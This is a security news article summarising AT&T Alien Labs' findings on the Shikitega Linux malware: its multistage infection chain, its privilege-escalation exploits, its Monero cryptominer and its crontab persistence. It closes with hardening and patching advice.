Evasive Shikitega Linux malware drops Monero cryptominer

Researchers from the AT&T Alien Labs Resarch have discovered a new and stealthy Linux malware it’s dubbed Shikitega. Once it’s on a machine or device, Shitega executes a “multistage infection chain” involving small files, a couple of vulnerabilities, and the use of Mettle, a portable Metasploit Meterpreter. Shikitega can give threat actors complete control of an infected system, with a persistent cryptominer churning out Monero in the background.

The chain

At its core, Shikitega is evasive, and its sneakiness becomes apparent the moment its infection chain begins.

AT&T reports that Shikitega is dropped onto Linux endpoints and devices by a malicious ELF file no bigger than 400 bytes. This ELF dropper also contains an encoded shellcode. Once dropped, Shikitega decodes each layer of itself using the polymorphic XOR additive feedback encoder, Shikata Ga Nai (or “It cannot be helped” from the Japanese), until the last shellcode payload is decoded. After this, the shellcode executes to reach out to its cloudflare-hosted command-and-control (C2) server to receive additional commands.

One of these commands is to download and execute Mettle, which allows attackers to take full remote control of the compromised host machine or device. Shikitega also fetches another malicious ELF file—an exploit—to target the CVE-2021-4034 and CVE-2021-3493 vulnerabilities. Exploiting these can elevate an attacker’s privileges, so they can download and run the XMRig Monero cryptominer as root.

For this miner to persist, Shikitega downloads and executes five scripts that set four crontabs (scheduled tasks): Two for the logged-in user and two for the root user. “As the malware persists with crontabs, it will delete all downloaded files from the system to hide its presence,” the researchers said in the report.

Protect your Linux system from Shikitega

Linux users can protect their systems from Shikitega with standard Linux hardening precautions, prompt patching to close vulnerabilities like CVE-2021-4034 and CVE-2021-3493, and with effective anti-malware and EDR on servers and endpoints. These should be paired with offsite and offline backups to provide an effective fallback.

Forget what you may have heard about Linux not having malware—every operating system is targeted by threat actors, and every one has malware. It’s just that the tactics techniques and procedures vary according to the way the operating systems work, and roles they play in our lives and on our business networks.